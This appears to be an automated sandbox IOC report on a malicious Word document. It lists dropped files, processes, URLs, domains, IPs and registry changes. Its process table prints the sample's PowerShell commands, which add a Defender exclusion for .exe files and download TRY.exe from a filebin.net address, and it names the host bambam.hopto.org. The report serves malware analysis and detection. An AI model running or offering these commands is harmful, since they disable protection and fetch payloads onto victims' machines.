IOC Report
12543_0008858249_FWDOUTSTANDING_20200604.doc

loading gif

Files

File Path
Type
Category
Malicious
12543_0008858249_FWDOUTSTANDING_20200604.doc
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 20 03:06:00 2022, Last Saved Time/Date: Wed Apr 20 03:06:00 2022, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
initial sample
 malicious
C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\~DF3D7E64A57D9B524A.TMP
Composite Document File V2 Document, Cannot read section info
dropped
 malicious
C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP
Composite Document File V2 Document, Cannot read section info
dropped
 malicious
C:\Config.Msi\54841c.rbs
data
dropped
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\931CA4E3-9003-4E2D-AC60-8F56ED9BC214
XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{1A0CB39D-07E3-4E62-8803-0A309F2608CA}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\IXP000.TMP\thai.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files.cab
Microsoft Cabinet archive data, 155244 bytes, 1 file
dropped
C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe (copy)
PE32+ executable (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\fd1981f4a71244758e929e11db0d4f1d$dpx$.tmp\bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp
PE32+ executable (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\msiwrapper.ini
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_au1v2jy0.qdl.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dk05raat.4wt.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_myufjp0m.iol.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgd2gy31.vwg.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DFA309B2BDC50B89D5.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\12543_0008858249_FWDOUTSTANDING_20200604.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:28:54 2022, mtime=Wed Apr 20 15:28:12 2022, atime=Wed Apr 20 15:28:06 2022, length=62976, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
Little-endian UTF-16 Unicode text, with CR line terminators
dropped
C:\Users\user\Desktop\~$543_0008858249_FWDOUTSTANDING_20200604.doc
data
dropped
C:\Users\user\Documents\20220420\PowerShell_transcript.377142.dqLccvHK.20220420092831.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\Documents\20220420\PowerShell_transcript.377142.szj6FUBY.20220420092838.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
C:\Windows\Installer\54841d.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 11.0.18362.1, Subject: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {4982A61C-946D-4168-809C-13FF99C4C351}, Create Time/Date: Thu Feb 18 21:32:30 2021, Last Saved Time/Date: Thu Feb 18 21:32:30 2021, Number of Pages: 200, Number of Words: 2, Name of Creating Application: MSI Wrapper (10.0.50.0), Security: 2
dropped
C:\Windows\Installer\MSI1064.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Installer\MSI847A.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Installer\MSI94E.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 11.0.18362.1, Subject: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {4982A61C-946D-4168-809C-13FF99C4C351}, Create Time/Date: Thu Feb 18 21:32:30 2021, Last Saved Time/Date: Thu Feb 18 21:32:30 2021, Number of Pages: 200, Number of Words: 2, Name of Creating Application: MSI Wrapper (10.0.50.0), Security: 2
dropped
C:\Windows\Installer\MSIFECC.tmp
data
dropped
C:\Windows\Installer\MSIFECD.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Installer\inprogressinstallinfo.ipi
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Installer\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}\ProductIcon
MS Windows icon resource - 13 icons, 48x48, 16 colors, 4 bits/pixel, 32x32, 16 colors, 4 bits/pixel
dropped
C:\Windows\Logs\DPX\setupact.log
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
C:\Windows\Temp\~DF20598E5DAB6B2B3C.TMP
data
dropped
C:\Windows\Temp\~DF20725BC976A732BA.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF3B9CC377E0CCEDD0.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF81A71F8F35F618E7.TMP
data
dropped
C:\Windows\Temp\~DF9ADBD6665E8B4CBD.TMP
data
dropped
C:\Windows\Temp\~DF9BB32A0C57F82C0E.TMP
data
modified
C:\Windows\Temp\~DFAB5AE087B19AB60D.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFAC439D90DB59E05A.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFDFFC1564218D87CA.TMP
data
dropped
C:\Windows\Temp\~DFE29D32E56A221400.TMP
data
dropped
C:\Windows\Temp\~DFFFE9197EB1FCF16E.TMP
Composite Document File V2 Document, Cannot read section info
dropped
\Device\ConDrv
ASCII text, with CRLF, CR, LF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{02CF5D71-875F-4179-8CDC-9768D4E5C0E6}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files.cab
Microsoft Cabinet archive data, 155244 bytes, 1 file
dropped
C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\$dpx$.tmp\79bd875a22ddb24abfa2594fbd40eccf.tmp
PE32+ executable (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe (copy)
PE32+ executable (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\msiwrapper.ini
data
dropped
C:\Users\user\AppData\Local\Temp\~DF471414B699306DAC.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF79ACBA3F38B53A85.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFECA159C20646BB57.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2L3NA9KPRDQMPGEYZP5Y.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CRATQOCQH2NC42QQ51D9.temp
data
dropped
C:\Windows\Installer\535fae.ipi
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Installer\MSI5B5A.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 11.0.18362.1, Subject: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {4982A61C-946D-4168-809C-13FF99C4C351}, Create Time/Date: Thu Feb 18 21:32:30 2021, Last Saved Time/Date: Thu Feb 18 21:32:30 2021, Number of Pages: 200, Number of Words: 2, Name of Creating Application: MSI Wrapper (10.0.50.0), Security: 2
dropped
C:\Windows\Installer\MSI9F1.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
There are 52 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe
"C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Set-MpPreference -ExclusionExtension ".exe"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"
 malicious
C:\Windows\System32\rundll32.exe
C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
 malicious
C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe
"C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe"
malicious
C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
C:\Windows\System32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2C09DD3AEE1859E1D48AC181D73EE6A9
C:\Windows\SysWOW64\icacls.exe
"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\expand.exe
"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
cmd /c thai.bat
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)LOW
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96
C:\Windows\SysWOW64\icacls.exe
"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
C:\Windows\SysWOW64\icacls.exe
"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
There are 12 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi
185.47.40.36
 malicious
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:
unknown
 malicious
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-180029104309546480
unknown
 malicious
https://filebin.net/rf43v6qzghbj7h7b/$
unknown
 malicious
https://filebin.net/rf43v6qzghbj7h7b/
unknown
 malicious
https://filebin.net/rf43v6qzghbj7h7b/TRY.exe
185.47.40.36
 malicious
bambam.hopto.org
malicious
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-1261261808309546470
unknown
 malicious
https://api.diagnosticssdf.office.com
unknown
https://login.microsoftonline.com/
unknown
https://shell.suite.office.com:1443
unknown
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
unknown
https://autodiscover-s.outlook.com/
unknown
https://roaming.edog.
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
unknown
https://cdn.entity.
unknown
https://api.addins.omex.office.net/appinfo/query
unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey
unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
unknown
https://powerlift.acompli.net
unknown
https://rpsticket.partnerservices.getmicrosoftkey.com
unknown
https://lookup.onenote.com/lookup/geolocation/v1
unknown
https://cortana.ai
unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://cloudfiles.onenote.com/upload.aspx
unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
unknown
https://entitlement.diagnosticssdf.office.com
unknown
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
unknown
https://api.aadrm.com/
unknown
https://ofcrecsvcapi-int.azurewebsites.net/
unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
unknown
https://api.microsoftstream.com/api/
unknown
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
unknown
https://cr.office.com
unknown
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
unknown
https://portal.office.com/account/?ref=ClientMeControl
unknown
https://graph.ppe.windows.net
unknown
https://res.getmicrosoftkey.com/api/redemptionevents
unknown
https://powerlift-frontdesk.acompli.net
unknown
https://tasks.office.com
unknown
https://officeci.azurewebsites.net/api/
unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work
unknown
https://store.office.cn/addinstemplate
unknown
https://api.aadrm.com
unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=
unknown
https://globaldisco.crm.dynamics.com
unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://dev0-api.acompli.net/autodetect
unknown
https://www.odwebp.svc.ms
unknown
https://api.diagnosticssdf.office.com/v2/feedback
unknown
https://api.powerbi.com/v1.0/myorg/groups
unknown
https://web.microsoftstream.com/video/
unknown
https://api.addins.store.officeppe.com/addinstemplate
unknown
https://graph.windows.net
unknown
https://dataservice.o365filtering.com/
unknown
https://officesetup.getmicrosoftkey.com
unknown
https://analysis.windows.net/powerbi/api
unknown
https://prod-global-autodetect.acompli.net/autodetect
unknown
https://outlook.office365.com/autodiscover/autodiscover.json
unknown
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
unknown
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
unknown
https://ncus.contentsync.
unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
unknown
http://weather.service.msn.com/data.aspx
unknown
https://apis.live.net/v5.0/
unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
unknown
https://management.azure.com
unknown
https://outlook.office365.com
unknown
https://wus2.contentsync.
unknown
https://incidents.diagnostics.office.com
unknown
https://clients.config.office.net/user/v1.0/ios
unknown
https://insertmedia.bing.office.net/odc/insertmedia
unknown
https://o365auditrealtimeingestion.manage.office.com
unknown
https://outlook.office365.com/api/v1.0/me/Activities
unknown
https://api.office.net
unknown
https://incidents.diagnosticssdf.office.com
unknown
https://asgsmsproxyapi.azurewebsites.net/
unknown
https://clients.config.office.net/user/v1.0/android/policies
unknown
https://entitlement.diagnostics.office.com
unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
unknown
https://substrate.office.com/search/api/v2/init
unknown
https://outlook.office.com/
unknown
https://storage.live.com/clientlogs/uploadlocation
unknown
https://outlook.office365.com/
unknown
https://webshell.suite.office.com
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
unknown
https://substrate.office.com/search/api/v1/SearchHistory
unknown
https://management.azure.com/
unknown
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
unknown
https://login.windows.net/common/oauth2/authorize
unknown
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
unknown
https://graph.windows.net/
unknown
https://api.powerbi.com/beta/myorg/imports
unknown
https://devnull.onenote.com
unknown
https://ncus.pagecontentsync.
unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
unknown
https://messaging.office.com/
unknown
There are 91 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
filebin.net
185.47.40.36
 malicious
situla.bitbit.net
87.238.33.8

IPs

IP
Domain
Country
Malicious
185.47.40.36
filebin.net
Norway
malicious
87.238.33.8
situla.bitbit.net
Norway
192.168.2.1
unknown
unknown
87.238.33.7
unknown
Norway

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
+!>
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
,!>
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
%>
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
RemoteClearDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3
Last
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
FilePath
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
StartDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
EndDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Properties
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Url
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
LastClean
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableWinHttpCertAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableIsOwnerRegex
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableSessionAwareHttpClose
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALForExtendedApps
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALSetSilentAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableGuestCredProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableOstringReplace
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
7.>
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\31167
31167
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSForms
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Word8.0
MSComctlLib
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
1
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
UpdateComplete
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033
Options Version
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 0
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 0
Data
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 1
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.1\1033\Option Set 1
Data
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\43769
43769
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
File Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Datetime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Position
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
VisiFlm
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutoGrammar
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutosaveInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
PreferredView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\43769
43769
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\Trusted Documents
LastPurgeTime
